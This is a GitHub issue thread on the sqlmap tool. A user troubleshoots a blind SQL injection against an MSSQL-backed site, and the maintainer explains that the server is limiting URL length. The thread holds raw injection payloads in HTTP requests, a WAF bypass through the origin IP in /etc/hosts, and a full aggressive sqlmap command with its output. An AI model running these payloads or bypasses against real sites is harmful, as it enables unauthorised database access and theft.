### ISSUE TITLE
Unable to pull database mssql.

### ISSUE THREAD

**Issue by Phoenix1112** [sqlmapproject/sqlmap#5075]
hello thanks for this project. I have a target using mssql and I have manually verified sql injection.

```
GET /and-path"%20AND%2020>(2*2)%20AND%20"0006pHf"="0006pHf/ HTTP/2
Host: target.com
X-Requested-With: XMLHttpRequest
```

response[true]:

```
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 123432
```
---------------------------------------------
```
GET /and-path"%20AND%2020<(2*2)%20AND%20"0006pHf"="0006pHf/ HTTP/2
Host: target.com
X-Requested-With: XMLHttpRequest
```

response[false]:

```
HTTP/2 404 Not Found
Content-Type: text/html; charset=utf-8
Content-Length: 108148
```
---------------------------------------------
I can also confirm that there is sql injection with the equals and not equals operators. but I don't want to want to add more here. i know i have waf problem because target site is using aws service. so I found the real ip address of the target site and added it to the /etc/hosts file.  I saved the vulnerable request like the one below to a file as sql.txt.

sql.txt

```
GET /any-path* HTTP/2
Host: target.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla Firefox 55/66
```

I'm pretty sure the target site is using mssql. because this information was given to me by the target site. I ran my sqlmap command using as follows.

```
sqlmap -r sql.txt --skip-waf --level=5 --risk=3 --force-ssl --batch --dbs --dbms=mssql --flush-session
```

sqlmap could not pull the database and gave an output as below.

```
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 477 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://example.com:443/any-path" AND 8076=8076 AND "mjFd"="mjFd
---
[15:07:24] [INFO] testing Microsoft SQL Server
[15:07:25] [WARNING] the back-end DBMS is not Microsoft SQL Server
[15:07:25] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
[15:07:25] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 289 times, 404 (Not Found) - 2 times, 500 (Internal Server Error) - 29 times
```

I know the target site is using mssql but sqlmap still couldn't find it. Also, even though I retested with --no-cast and --hex parameters, I still couldn't get any results. I used --tamper=between and some tampers but still the result is not changed. what is the problem ?

**Comment by stamparm** [comment]
then you've found the cause of your problem. server is restraining the requests having URL greater than a certain size. this is something that often happens around. not a sqlmap's fault.

if `--no-cast --no-escape` doesn't help you, then you'll need to either: A) do a manual retrieval of data (e.g. by using similar payloads you've seen with `-v 3`) or B) accept the situation as is, and just retrieve data that can be retrieved in the current situation
